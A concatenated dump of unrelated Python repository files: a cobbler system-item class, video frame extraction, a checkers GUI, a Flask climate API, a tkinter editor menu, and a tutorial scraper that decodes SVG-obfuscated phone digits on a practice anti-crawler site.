%s\") % profile_name)\n\n    def set_image(self, image_name):\n        \"\"\"\n        Set the system to use a certain named image. Works like set_profile\n        but cannot be used at the same time. 
It's one or the other.\n        \"\"\"\n        old_parent = self.get_parent()\n        if image_name in [\"delete\", \"None\", \"~\", \"\"] or image_name is None:\n            self.image = \"\"\n            if isinstance(old_parent, item.Item):\n                old_parent.children.pop(self.name, 'pass')\n            return\n\n        self.profile = \"\"  # mutual exclusion rule\n\n        img = self.collection_mgr.images().find(name=image_name)\n\n        if img is not None:\n            self.image = image_name\n            self.depth = img.depth + 1\n            if isinstance(old_parent, item.Item):\n                old_parent.children.pop(self.name, 'pass')\n            new_parent = self.get_parent()\n            if isinstance(new_parent, item.Item):\n                new_parent.children[self.name] = self\n            return\n        raise CX(_(\"invalid image name (%s)\") % image_name)\n\n    def set_virt_cpus(self, num):\n        return utils.set_virt_cpus(self, num)\n\n    def set_virt_file_size(self, num):\n        return utils.set_virt_file_size(self, num)\n\n    def set_virt_disk_driver(self, driver):\n        return utils.set_virt_disk_driver(self, driver)\n\n    def set_virt_auto_boot(self, num):\n        return utils.set_virt_auto_boot(self, num)\n\n    def set_virt_pxe_boot(self, num):\n        return utils.set_virt_pxe_boot(self, num)\n\n    def set_virt_ram(self, num):\n        return utils.set_virt_ram(self, num)\n\n    def set_virt_type(self, vtype):\n        return utils.set_virt_type(self, vtype)\n\n    def set_virt_path(self, path):\n        return utils.set_virt_path(self, path, for_system=True)\n\n    def set_netboot_enabled(self, netboot_enabled):\n        \"\"\"\n        If true, allows per-system PXE files to be generated on sync (or add). If false,\n        these files are not generated, thus eliminating the potential for an infinite install\n        loop when systems are set to PXE boot first in the boot order. In general, users\n        who are PXE booting first in the boot order won't create system definitions, so this\n        feature primarily comes into play for programmatic users of the API, who want to\n        initially create a system with netboot enabled and then disable it after the system installs,\n        as triggered by some action in automatic installation file's %post section.\n        For this reason, this option is not surfaced in the CLI, output, or documentation (yet).\n\n        Use of this option does not affect the ability to use PXE menus. 
If an admin has machines\n        set up to PXE only after local boot fails, this option isn't even relevant.\n        \"\"\"\n        self.netboot_enabled = utils.input_boolean(netboot_enabled)\n\n    def set_autoinstall(self, autoinstall):\n        \"\"\"\n        Set the automatic installation template filepath; this must be a local file.\n\n        @param str local automatic installation template file path\n        \"\"\"\n\n        autoinstall_mgr = autoinstall_manager.AutoInstallationManager(self.collection_mgr)\n        self.autoinstall = autoinstall_mgr.validate_autoinstall_template_file_path(autoinstall)\n\n    def set_power_type(self, power_type):\n        if power_type is None:\n            power_type = \"\"\n        power_manager.validate_power_type(power_type)\n        self.power_type = power_type\n\n    def set_power_user(self, power_user):\n        if power_user is None:\n            power_user = \"\"\n        utils.safe_filter(power_user)\n        self.power_user = power_user\n\n    def set_power_pass(self, power_pass):\n        if power_pass is None:\n            power_pass = \"\"\n        utils.safe_filter(power_pass)\n        self.power_pass = power_pass\n\n    def set_power_address(self, power_address):\n        if power_address is None:\n            power_address = \"\"\n        utils.safe_filter(power_address)\n        self.power_address = power_address\n\n    def set_power_id(self, power_id):\n        if power_id is None:\n            power_id = \"\"\n        utils.safe_filter(power_id)\n        self.power_id = power_id\n\n    def modify_interface(self, _dict):\n        \"\"\"\n        Used by the WUI to modify an interface more-efficiently\n        \"\"\"\n\n        for (key, value) in _dict.iteritems():\n            (field, interface) = key.split(\"-\", 1)\n            field = field.replace(\"_\", \"\").replace(\"-\", \"\")\n\n            if field == \"bondingopts\":\n                self.set_bonding_opts(value, interface)\n\n            if field == \"bridgeopts\":\n                self.set_bridge_opts(value, interface)\n\n            if field == \"connectedmode\":\n                self.set_connected_mode(value, interface)\n\n            if field == \"cnames\":\n                self.set_cnames(value, interface)\n\n            if field == \"dhcptag\":\n                self.set_dhcp_tag(value, interface)\n\n            if field == \"dnsname\":\n                self.set_dns_name(value, interface)\n\n            if field == \"ifgateway\":\n                self.set_if_gateway(value, interface)\n\n            if field == \"interfacetype\":\n                self.set_interface_type(value, interface)\n\n            if field == \"interfacemaster\":\n                self.set_interface_master(value, interface)\n\n            if field == \"ipaddress\":\n                self.set_ip_address(value, interface)\n\n            if field == \"ipv6address\":\n                self.set_ipv6_address(value, interface)\n\n            if field == \"ipv6defaultgateway\":\n                self.set_ipv6_default_gateway(value, interface)\n\n            if field == \"ipv6mtu\":\n                self.set_ipv6_mtu(value, interface)\n\n            if field == \"ipv6prefix\":\n                self.set_ipv6_prefix(value, interface)\n\n            if field == \"ipv6secondaries\":\n                self.set_ipv6_secondaries(value, interface)\n\n            if field == \"ipv6staticroutes\":\n                self.set_ipv6_static_routes(value, interface)\n\n            if field == \"macaddress\":\n                self.set_mac_address(value, interface)\n\n            if field == \"management\":\n                self.set_management(value, interface)\n\n            if field == \"mtu\":\n                self.set_mtu(value, interface)\n\n            if field == \"netmask\":\n                self.set_netmask(value, interface)\n\n            if field == \"static\":\n                self.set_static(value, interface)\n\n            if field == \"staticroutes\":\n                self.set_static_routes(value, interface)\n\n            if field == \"virtbridge\":\n                self.set_virt_bridge(value, interface)\n\n    def set_repos_enabled(self, repos_enabled):\n        self.repos_enabled = utils.input_boolean(repos_enabled)\n\n    def set_serial_device(self, device_number):\n        return utils.set_serial_device(self, device_number)\n\n    def set_serial_baud_rate(self, baud_rate):\n        return 
utils.set_serial_baud_rate(self, baud_rate)\n\n# EOF\n","repo_name":"shenson/cobbler","sub_path":"cobbler/item_system.py","file_name":"item_system.py","file_ext":"py","file_size_in_byte":29877,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"7609063694","text":"# %%\r\n'''----------------------------------------------------------------\r\nVideo formatt is .avi Primarily use OpenCV to process data\r\nAll imports data initialized paths goes here\r\nFunction 1. Read and Extract all the frames from videos for downstream\r\n cell segmentation\r\n----------------------------------------------------------------'''\r\nimport cv2\r\nimport os\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\n# %%\r\n'''----------------------------------------------------------------\r\nCapture Video and get each frames then save them into .png format\r\nEach Video will be in a different folder\r\n----------------------------------------------------------------'''\r\ndef CaptureVideo(video_path):\r\n video_name = os.path.split(video_path)[1]\r\n print (f'----- {video_name} -----')\r\n os.chdir('D:\\Rotation2\\VideoFrame')\r\n frame_folder = './' + 'original_' + video_name\r\n if not os.path.exists(frame_folder):\r\n os.mkdir(frame_folder)\r\n\r\n cap = cv2.VideoCapture(video_path)\r\n total_frame = cap.get(7)\r\n print (f'----- Total Number of Frames [{cap.get(7)}] -----')\r\n\r\n Index = 1\r\n while(cap.isOpened()):\r\n ret, frame = cap.read()\r\n\r\n if ret:\r\n print (f'----- Frame # {Index} -----')\r\n frame = Crop_Pic(frame)\r\n ExtractColor(img = frame, video_name = video_name, index = Index)\r\n img_rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\r\n\r\n plt.xticks([])\r\n plt.yticks([])\r\n plt.title('Frame ' + str(Index))\r\n os.chdir('D:\\Rotation2\\VideoFrame')\r\n plt.imsave(frame_folder + '/Frame_' + str(Index) + '.png', img_rgb, format = 'png')\r\n plt.close()\r\n \r\n Index = Index + 1\r\n if Index > total_frame:\r\n break\r\n\r\n cap.release()\r\n cv2.destroyAllWindows()\r\n\r\n# %%\r\n'''----------------------------------------------------------------\r\nCrop the image to exclude the 50um and timelines\r\nAssume it is a squre and it locates at the centre of the pics\r\n----------------------------------------------------------------'''\r\ndef Crop_Pic(img):\r\n shape = img.shape\r\n height, width = shape[0], shape[1]\r\n left_edge = int(width / 2 - height / 2)\r\n right_edge = int(width / 2 + height / 2)\r\n img = img[0:height, left_edge:right_edge]\r\n return img\r\n\r\n# %%\r\n'''----------------------------------------------------------------\r\nExtrace Red and Yellow Color Channel\r\n----------------------------------------------------------------'''\r\ndef ExtractColor(img, video_name, index):\r\n '''\r\n For yellow part, set red and blue channel to 0, therefore convert them to green channel only\r\n For red part, set blue channel to 0\r\n For the rest of the place, substract Red - Green to get pure red\r\n Two types of cells combined. 
Then substract Red - Green again to acquire pure B cells\r\n Then adjust the negative or noise values\r\n '''\r\n os.chdir('D:\\Rotation2\\VideoFrame')\r\n frame_folder = './' + 'extract_' + video_name\r\n if not os.path.exists(frame_folder):\r\n os.mkdir(frame_folder)\r\n\r\n yellow = img.copy()\r\n yellow[:, :, 0] = 0 # blue\r\n yellow[:, :, 2] = 0 # red\r\n SaveImg(yellow, 'Yellow', frame_folder, index)\r\n\r\n blur = yellow.copy()\r\n blur = cv2.pyrMeanShiftFiltering(blur, 25, 5)\r\n os.chdir('D:\\Rotation2\\VideoFrame')\r\n SaveImg(blur, 'YellowBlur', frame_folder, index)\r\n\r\n red = img.copy()\r\n red[:, :, 0] = 0 # blue\r\n red[:, :, 1] = 0 # green\r\n\r\n for i in range(np.shape(red)[0]):\r\n for j in range(np.shape(red)[1]):\r\n if red[i, j, 2] < yellow[i, j ,1]:\r\n red[i, j, 2] = 0\r\n else:\r\n red[i, j, 2] = red[i, j, 2] - yellow[i, j, 1]\r\n\r\n os.chdir('D:\\Rotation2\\VideoFrame')\r\n SaveImg(red, 'Red', frame_folder, index)\r\n\r\n# %%\r\n'''----------------------------------------------------------------\r\nSave individual image to Red and Yellow folder respectively\r\n----------------------------------------------------------------'''\r\ndef SaveImg(img, color, frame_folder, index):\r\n img_grey = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\r\n\r\n if not os.path.exists(frame_folder + '/' + color):\r\n os.mkdir(frame_folder + '/' + color)\r\n os.chdir(frame_folder + '/' + color)\r\n\r\n for contrast in ['Colour', 'Grey']:\r\n if not os.path.exists('./' + contrast):\r\n os.mkdir('./' + contrast)\r\n if contrast == 'Colour':\r\n plt.imsave('./' + contrast + '/Frame_' + str(index).zfill(3) + '.png', img, format = 'png')\r\n if contrast == 'Grey':\r\n cv2.imwrite('./' + contrast + '/GreyFrame_' + str(index).zfill(3) + '.png', img_grey)\r\n\r\n# %%\r\n'''----------------------------------------------------------------\r\nGet all the videos paths from objective_directory\r\n----------------------------------------------------------------'''\r\ndef Get_Video_Path(objective_directory):\r\n all_files = []\r\n for lists in os.listdir(objective_directory):\r\n if lists.endswith('.avi'):\r\n all_files.append(os.path.join(objective_directory, lists))\r\n return all_files\r\n\r\n# %%\r\n'''----------------------------------------------------------------\r\nMain part of the module goes here\r\n----------------------------------------------------------------'''\r\nif __name__ == '__main__':\r\n # A series of videos go here.\r\n objective_directory = 'D:\\Rotation2\\IVM-MRes project #2\\Video data (back-up)'\r\n all_files = Get_Video_Path(objective_directory)\r\n for files in all_files:\r\n CaptureVideo(files)\r\n \r\n # A solely video goes here.\r\n CaptureVideo('D:\\Rotation2\\VideoFrame\\Exp 18-5-18 FTY720\\FTY720 spleen 1h both cells after.avi')","repo_name":"michaelgmz/MRes-2020DS-Project2","sub_path":"PyCodes/LoadVideo.py","file_name":"LoadVideo.py","file_ext":"py","file_size_in_byte":5756,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"27138770424","text":"training_param = {\n 'init_scale': 0.1,\n 'learning_rate': 1.0,\n 'learning_rate_decay': 0.5,\n 'decay_after': 10,\n 'num_epochs': 20,\n 'batch_size': 20,\n 'keep_prob': 0.82,\n 'max_grad_norm': 5,\n 'num_layers': 1,\n 'num_steps': 38,\n 'hidden_size': 270,\n}\n\nmodel_path = './model'\nwords_path = './data/vocabulary.pkl'\nword_to_id_path = './data/vocabulary_to_id.pkl'\ntraining_data_path = 
'./data/training_data.pkl'\n","repo_name":"vinachang/chung_generator","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"41596820947","text":"from typing import Dict\r\n\"\"\"\r\nCalculate rate of prediction from predicted triples.\r\nThe rate is used as a feature in the classification model.\r\n\"\"\"\r\nf = open('predicted_triples.csv')\r\nlines = f.readlines()\r\nf.close()\r\n\r\ncount_heads: Dict = {}\r\ncount_tails: Dict = {}\r\nentity_map: Dict = {}\r\n\r\n# line format: id, head_name, relation_name, tail_name, score, rank, head, tail\r\nfor line in lines:\r\n    tokens = line.strip().split(',')\r\n    head_name = tokens[1]\r\n    tail_name = tokens[3]\r\n    head = tokens[6]\r\n    tail = tokens[7]\r\n    if head not in entity_map:\r\n        entity_map[head] = head_name\r\n    if tail not in entity_map:\r\n        entity_map[tail] = tail_name\r\n    if head not in count_heads:\r\n        count_heads[head] = 0\r\n    if head not in count_tails:\r\n        count_tails[head] = 0\r\n    if tail not in count_heads:\r\n        count_heads[tail] = 0\r\n    if tail not in count_tails:\r\n        count_tails[tail] = 0\r\n    count_heads[head] += 1\r\n    count_tails[tail] += 1\r\n\r\nsum_count = len(lines)\r\n\r\nout_heads = open('predicted_heads_rate.csv', 'w')\r\nout_tails = open('predicted_tails_rate.csv', 'w')\r\n\r\nfor key in count_heads.keys():\r\n    out_heads.write(entity_map[key] + ',' + key + ',' + str(count_heads[key] / sum_count) + '\\n')\r\n    out_tails.write(entity_map[key] + ',' + key + ',' + str(count_tails[key] / sum_count) + '\\n')\r\n\r\nout_heads.close() \r\nout_tails.close()","repo_name":"HYU2023-ClassFinder/prediction-triple-classifier","sub_path":"get_prediction_rate.py","file_name":"get_prediction_rate.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"71551299280","text":"# -*- coding: utf-8 -*-\n\n'''\n@Author : Corley Tang\n@contact : cutercorleytd@gmail.com\n@Github : https://github.com/corleytd\n@Time : 2023-12-16 10:06\n@Project : Hands-on Crawler with Python-anti_crawler_with_svg_mapping\nSVG mapping anti-crawler\nhttp://42.194.197.95:8001/svg\n'''\n\n# Import the required libraries\nimport re\n\nimport requests\nfrom bs4 import BeautifulSoup\n\ncookies = {\n    'session': '.eJyrViotTi1SsqpWyiyOT0zJzcxTsjLQUcrJTwexSopKU3WUcvOTMnNSlayUDM3gQEkHrDE-M0XJyhjCzkvMBSmKKTU3NbKIKTUzMjZXqq0FAN1MHbY.ZXcBDQ.EQ1PisBh-GQTUOfEjYBwWL3dRXw'\n}\n\nurl = 'http://42.194.197.95:8001/svg'\nsvg_url = 'http://42.194.197.95:8001/static/number.svg'\ncss_url = 'http://42.194.197.95:8001/static/css/phone_svg.css'\nfont_size_pattern = re.compile(r'font-size:(\\d+)px')\n\n# Fetch the SVG content and the CSS stylesheet content\nsvg_content = requests.get(svg_url, cookies=cookies).text\ncss_content = requests.get(css_url, cookies=cookies).text\n\n\ndef get_location_from_css(css_content, class_name):\n    '''\n    Get the position corresponding to a given class from the CSS\n    :param css_content: raw CSS code\n    :param class_name: class attribute value\n    :return: x and y coordinates corresponding to the given class attribute value\n    '''\n    css_content = css_content.replace('\\n', '').replace(' ', '')  # remove the newlines and spaces from the CSS\n    locations = re.findall('.%s{background:-(\\d+)px-(\\d+)px;}' % class_name, css_content)\n    return int(locations[0][0]), int(locations[0][1])\n\n\ndef get_font_size_y_text_from_svg(svg_content):\n    '''\n    Get the font size, the y coordinates of all lines and the texts from the SVG\n    :param svg_content: raw SVG code\n    :return: font size, y coordinates, texts\n    '''\n    sizes = font_size_pattern.findall(svg_content)\n    font_size = int(sizes[0]) if sizes else 16  # the default font size in SVG is 16\n\n    dom = 
BeautifulSoup(svg_content, 'xml')  # parse the SVG\n    text_tags = dom.find_all('text')  # get all the text tags\n    y_locations = [int(tag.attrs['y']) for tag in text_tags]\n    texts = [tag.text for tag in text_tags]\n\n    return font_size, y_locations, texts\n\n\ndef get_num_from_class(class_name, font_size, y_locations, texts):\n    '''\n    Get the digit corresponding to the given class attribute\n    :param class_name: class attribute value\n    :param font_size: font size\n    :param y_locations: y attribute values of all the text tags in the SVG\n    :param texts: texts of all the text tags in the SVG\n    :return: the digit corresponding to the given class value\n    '''\n    css_x, css_y = get_location_from_css(css_content, class_name)  # get the position corresponding to the current class attribute\n    chosen_y = [y for y in y_locations if y >= css_y][0]  # relation between the CSS and SVG y coordinates: take the first SVG y coordinate >= the CSS one, i.e. the closest one\n    chosen_text = texts[y_locations.index(chosen_y)]  # the selected line\n    x_location = css_x // font_size  # x coordinate of the digit\n    num = chosen_text[x_location]  # locate the digit at the x coordinate\n    return num\n\n\ndef crawl():\n    '''\n    Main crawler program:\n    1. Get all the relevant class attributes from the web page;\n    2. Get the coordinates of the corresponding digit from the CSS according to the class;\n    3. Get all the y coordinates and text values in the SVG file;\n    4. Locate the line the digit is on according to the CSS y coordinate;\n    5. Get the digit on that line according to the CSS x coordinate and the font size.\n    :return: the concatenated phone number\n    '''\n    # Get the shared information (font size, y coordinates, texts); this only needs to run once\n    font_size, y_locations, texts = get_font_size_y_text_from_svg(svg_content)\n\n    response = requests.get(url, cookies=cookies)\n    dom = BeautifulSoup(response.text, 'lxml')\n    d_tags = dom.find('div', class_='media-body').find_all('p')[2].find_all(\n        'd')  # get all the d tags under the 3rd p tag under the div tag whose class is media-body, i.e. where the phone number is located\n    phone_number = [get_num_from_class(d.attrs['class'][0], font_size, y_locations, texts) for d in d_tags]\n    return ''.join(phone_number)\n\n\nif __name__ == '__main__':\n    phone_number = crawl()\n    print(phone_number)\n","repo_name":"corleytd/Hands-on-Crawler-with-Python","sub_path":"08_front_end_anti_crawler/anti_crawler_with_svg_mapping.py","file_name":"anti_crawler_with_svg_mapping.py","file_ext":"py","file_size_in_byte":3946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"5173852585","text":"import sys\n\nfrom Board import Board\nfrom Checker import Checker\nfrom Image_Button import PicButton\n\ntry:\n    from PyQt5 import QtGui, QtWidgets, QtCore\nexcept Exception as e:\n    print('PyQt5 not found: \"{}\"'.format(e),\n          file=sys.stderr)\n    sys.exit(1)\n\nCELLSIZE = 72\n\n\nclass GUI(QtWidgets.QWidget):\n    def __init__(self, board: Board):\n        super(GUI, self).__init__()\n        self.board = board\n        self.init_button_undo()\n        self.init_button_redo()\n        self.initUI()\n        self.show()\n\n    def initUI(self):\n        self.setGeometry(0, 0, CELLSIZE * 11, CELLSIZE * 8)\n        self.load_images(\n            [\"white.png\", \"black.png\", \"checkerD.png\", \"checkerW.png\",\n             \"QueenD.png\", \"QueenW.png\", \"scoreBoard.png\", \"Menu.png\",\n             \"checkerD.png\", \"ButtonL.png\"])\n        self.setFixedSize(CELLSIZE * 8, CELLSIZE * 8.5)\n\n    def load_images(self, images_names):\n        self.images = {name: QtGui.QImage(\"Images\\\\\" + name) for name in\n                       images_names}\n\n    def mousePressEvent(self, q_mouse_event):\n        self.board.handle_mouse_click(q_mouse_event.pos(), CELLSIZE)\n        self.repaint()\n\n    def paintEvent(self, event):\n        painter = QtGui.QPainter()\n        painter.begin(self)\n        self._draw_board(painter)\n        painter.end()\n\n    def _draw_board(self, painter):\n        for x in range(8):\n            for y in range(8):\n                self._draw_cell(painter, (x, y))\n\n        for c in self.board.possible_move_cells:\n            self._draw_highlight(painter, c)\n\n        for checker in self.board.all_checkers:\n            self._draw_checker(painter, checker)\n\n        self.draw_panel(painter)\n\n    @staticmethod\n    def draw_panel(painter: QtGui.QPainter):\n        rect = QtCore.QRect(0, CELLSIZE * 8, CELLSIZE * 8, CELLSIZE * 0.5, )\n        
painter.fillRect(rect, QtGui.QBrush(QtGui.QColor(47, 79, 79)))\n\n @staticmethod\n def _draw_highlight(painter: QtGui.QPainter, coordinates):\n pen = QtGui.QPen(QtGui.QColor(255, 255, 0))\n pen.setWidth(3)\n painter.setPen(pen)\n painter.drawRect(coordinates[0] * CELLSIZE,\n coordinates[1] * CELLSIZE, CELLSIZE, CELLSIZE)\n painter.setPen(QtGui.QColor(0, 0, 0))\n\n def _draw_cell(self, painter: QtGui.QPainter, coords):\n painter.drawImage(coords[0] * CELLSIZE, coords[1] * CELLSIZE,\n self.images[\n \"black.png\" if self.board.is_black(\n *coords) else \"white.png\"])\n\n def _draw_checker(self, painter: QtGui.QPainter, checker: Checker):\n painter.drawImage(checker.x * CELLSIZE + 2, checker.y * CELLSIZE + 2,\n self.images[\n \"checkerD.png\" if checker.is_black\n else \"checkerW.png\"])\n\n def init_button_undo(self):\n pic = QtGui.QPixmap(\".\\\\Images\\\\ButtonD.png\")\n self.undo = PicButton(pic, \"undo\", self)\n self.undo.clicked.connect(self.run_undo)\n self.undo.resize(CELLSIZE * 4, CELLSIZE * 0.5)\n self.undo.move(0, CELLSIZE * 8)\n\n def run_undo(self):\n self.board.make_undo()\n self.repaint()\n\n def init_button_redo(self):\n pic = QtGui.QPixmap(\".\\\\Images\\\\ButtonD.png\")\n self.undo = PicButton(pic, \"redo\", self)\n self.undo.clicked.connect(self.run_redo)\n self.undo.resize(CELLSIZE * 4, CELLSIZE * 0.5)\n self.undo.move(CELLSIZE * 4, CELLSIZE * 8)\n\n def run_redo(self):\n self.board.make_redo()\n self.repaint()\n\n\nif __name__ == '__main__':\n app = QtWidgets.QApplication(sys.argv)\n gui = GUI(Board())\n\n sys.exit(app.exec_())\n","repo_name":"reindeermur/poddavki","sub_path":"GUI.py","file_name":"GUI.py","file_ext":"py","file_size_in_byte":3707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"25400048573","text":"import numpy as np\nimport pandas as pd\n\nimport sqlalchemy\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import create_engine, func\n\nfrom flask import Flask, jsonify\nimport datetime as dt\n\n\n#################################################\n# Database Setup\n#################################################\nengine = create_engine(\"sqlite:///./Resources/hawaii.sqlite\")\n\n# reflect an existing database into a new model\nBase = automap_base()\n# reflect the tables\nBase.prepare(engine, reflect=True)\n\n# Save reference to the table\nMeasurement = Base.classes.measurement\nStation = Base.classes.station\n\n#################################################\n# Flask Setup\n#################################################\napp = Flask(__name__)\n\n\n#################################################\n# Flask Routes\n#################################################\n@app.route(\"/\")\ndef welcome():\n \"\"\"List all available api routes.\"\"\"\n return (\n f\"Available Routes:
    \"\n f\"/api/v1.0/precipitation
    \"\n f\"/api/v1.0/stations
    \"\n f\"/api/v1.0/tobs
    \"\n f\"/api/v1.0/
    \"\n f\"/api/v1.0//\"\n )\n\n@app.route(\"/api/v1.0/precipitation\")\ndef precipitation():\n # Create our session (link) from Python to the DB\n session = Session(engine)\n\n # Query all precipitation\n results = session.query(Measurement.date, Measurement.prcp).all()\n\n session.close()\n\n # Create a dictionary from the row data and append to a list of precipitation\n all_precipitation = []\n for date, prcp in results:\n precipitation_dict = {}\n precipitation_dict[\"date\"] = date\n precipitation_dict[\"prcp\"] = prcp\n all_precipitation.append(precipitation_dict)\n\n return jsonify(all_precipitation)\n\n@app.route(\"/api/v1.0/stations\")\ndef stations():\n # Create our session (link) from Python to the DB\n session = Session(engine)\n\n # Query all stations\n results = session.query(Station.name).all()\n\n session.close()\n\n # Convert list of tuples into normal list\n all_stations = list(np.ravel(results))\n\n return jsonify(all_stations)\n\n@app.route(\"/api/v1.0/tobs\")\ndef tobs():\n # Create our session (link) from Python to the DB\n session = Session(engine)\n\n # Query all precipitation\n results = session.query(Measurement.date, Measurement.prcp).all()\n\n session.close()\n\n #Define data\n recent_date = session.query(Measurement.date).order_by((Measurement.date).desc()).first()\n year_ago = dt.date(2017, 8, 23) - dt.timedelta(days=365)\n temperature = session.query(Measurement.date, Measurement.tobs).\\\n filter(Measurement.date > year_ago).\\\n filter(Measurement.station == 'USC00519281' ).\\\n order_by(Measurement.date).all()\n\n # Create a dictionary from the row data and append to a list of results in temperature\n temp_results = []\n for date, prcp in results:\n temp_dict = {}\n temp_dict[\"date\"] = date\n temp_dict[\"prcp\"] = prcp\n temp_results.append(temp_dict)\n\n return jsonify(temp_results)\n\n@app.route(\"/api/v1.0/\")\ndef start_date(start):\n\n start_date = datetime.strptime(start, \"%Y-%m-%d\").date()\n sel = [Measurement.date,\n func.min(Measurement.tobs),\n func.max(Measurement.tobs),\n func.avg(Measurement.tobs)]\n data = session.query(*sel)\n for start_date in data:\n \n if Measurement.date == start_date or start_date < Measurement.date :\n return jsonify(data)\n\n return jsonify({\"error\": f\"No results for date {start_date} not found.\"}), 404\n\n@app.route(\"/api/v1.0//\")\ndef date_range(start, end):\n\n start_date = datetime.strptime(start, \"%Y-%m-%d\").date()\n end_date = datetime.strptime(end, \"%Y-%m-%d\").date()\n sel = [Measurement.date,\n func.min(Measurement.tobs),\n func.max(Measurement.tobs),\n func.avg(Measurement.tobs)]\n data = session.query(*sel)\n for start_date in data:\n \n if Measurement.date == start_date and Measurement.date <= end_date :\n return jsonify(data)\n\n return jsonify({\"error\": f\"No results for date range {start_date}/{end_date} not found.\"}), 404\n\nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"Abigail-GG/sqlalchemy-challenge","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"16846141872","text":"\"\"\"Module for the editor menu\"\"\"\n# pylint: disable=import-outside-toplevel\nimport tkinter as tk\n\nfrom shared_gui.base import BaseGUI\nfrom shared_managers.hotkey_manager import HotkeyManager\nfrom shared_utils.functions import Singleton\n\nfrom src.game.game import Game\nfrom src.hud.hud import Hud\nfrom src.utils.constants import DATA_MANAGER, 
HOTKEY_EDITOR_MENU\n\n\nclass GuiEditorMenuPopup(BaseGUI, metaclass=Singleton):\n \"\"\"\n A class representing a toggle window with hotkey functionality and a menu bar.\n\n Attributes:\n root (tkinter.Tk): The main window of the application.\n is_hidden (bool): A flag indicating whether the window is currently hidden.\n\n Methods:\n __init__(self): Initializes the ToggleWindow instance and runs the main event loop.\n toggle_visibility(self): Toggles the visibility of the window.\n setup_hotkey(self): Sets up the hotkey for toggling window visibility.\n create_menu(self): Creates the menu bar for the application.\n do_nothing(self): A dummy function that does nothing.\n \"\"\"\n\n def __init__(self, parent_root, debug_instantly_show_menu=False):\n \"\"\"\n Initializes a new instance of the ToggleWindow class and runs the main event loop.\n\n Create a fully transparent GUI the size of the entire screen so clicking out of the context menu closes it\n \"\"\"\n super().__init__(gui_type=\"sub\", parent_root=parent_root)\n self.hotkey_manager = HotkeyManager()\n\n # root\n self.debug_instantly_show_menu = debug_instantly_show_menu\n self.set_title(\"Editor Context Menu Popup\")\n self.set_transparency(0.3) # fully transparent makes it less reliable somehow\n self.set_decorations(False)\n self.set_always_on_top(False) # not setting this because it causes prompts to be behind the gui\n\n # Set size to entire screen because set_fullscreen has a 0.1 visible delay ;-)\n screen_width = self.root.winfo_screenwidth()\n screen_height = self.root.winfo_screenheight()\n self.set_window_geometry(f\"{screen_width}x{screen_height}\")\n\n self.data_manager = DATA_MANAGER\n self.game = Game()\n self.hud = Hud()\n\n from src.menu.main import EditorMenuClass\n\n self.my_editor_menu = EditorMenuClass(self)\n self.enable_hotkey()\n\n if self.debug_instantly_show_menu:\n self.show_popup()\n\n def enable_hotkey(self):\n \"\"\"Enable hotkey\"\"\"\n self.hotkey_manager.add_hotkey(HOTKEY_EDITOR_MENU, self.show_popup, suppress=False)\n\n def disable_hotkey(self):\n \"\"\"Disable hotkey\"\"\"\n self.hotkey_manager.remove_hotkey(HOTKEY_EDITOR_MENU) # prevent it from being pressed while menu is open\n\n def show_popup(self):\n \"\"\"Show menu at mouse cursor\"\"\"\n\n # Show gui so context menu can be closed by clicking out & Resize the GUI to the entire screen\n self.maximize() # not setting fullscreen because it disables alt+tab\n\n # get coordinates\n pos_x, pos_y = self.root.winfo_pointerxy()\n\n # show menu\n # self.dev_context_menu = self.my_editor_menu.get_developer_installer_menu(self.root)\n # self.dev_context_menu.post(pos_x, pos_y)\n self.my_editor_menu.create_and_refresh_menu(is_context_menu=True)\n self.show_post_menu(self.my_editor_menu.main_menu, pos_x, pos_y)\n\n # hide gui after context menu closed\n self.hide()\n print(f\"show_editor_menu_popup_gui_at_cursor: end hidden = {self.is_hidden}\")\n\n\ndef main():\n \"\"\"Debug gui class\"\"\"\n # pylint: disable=unused-variable\n root = tk.Tk()\n root.withdraw()\n # app = GuiEditorMenuPopup(root)\n app = GuiEditorMenuPopup(root, debug_instantly_show_menu=True)\n app.show(hide=True)\n # app.show(hide=False)\n # app.show(hidden=True)\n\n input(\"Press enter to exit script...\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"RB490/py-app-l4d-hud-editor","sub_path":"src/gui/popup.py","file_name":"popup.py","file_ext":"py","file_size_in_byte":3910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} 
